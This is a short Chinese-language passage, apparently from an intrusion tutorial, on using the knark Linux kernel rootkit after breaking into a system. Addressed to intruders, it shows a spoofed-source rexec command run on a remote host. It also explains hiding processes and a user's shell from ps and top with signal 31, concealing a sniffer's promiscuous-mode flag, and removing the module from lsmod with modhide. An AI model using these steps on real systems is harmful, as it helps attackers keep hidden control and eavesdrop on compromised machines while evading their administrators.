grep bash
creed 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash
rexec 远程执行命令,比如:
./rexec www.microsoft.com haxored.server.nu /bin/touch /LUDER
knark还有一些其它的特性:
将信号31发送给某个进程,能够在/proc里将进程文件隐藏起来,这样ps及top 都无法看到,比如:
#kill -31 pid
如果这个进程还有它的子进程,那么也将一同被隐藏起来,所以如果你把你的sh*ll隐藏掉的话,所有你键入的进程将都是不可见的。如果你想再看看,被隐藏起来的进程藏在什么地方的话,可以看/proc/knark/pids文件,这里列出所有隐藏的家伙;) 闯入一个系统中,sniffer总是入侵者们用来扩大战果的玩意儿,现在也存在许多小工具能够侦测到网卡是否被置于混杂模式,但如果你加载了这个模块,当人们在查询SIOCGIFFLAGS的标志位时,IFF_PROMISC——接口为随机(promiscuous)模式总是会被隐藏的。
这个包中还带有另一个小工具modhide,这个模块加载后,可以将最后加载至系统中的模块从
模块列表里移除——也就是/proc/module里面看不到它,示例如下:
#/sbin/insmod knark.o
#/sbin/lsmod
关键词:很酷的一篇入侵区分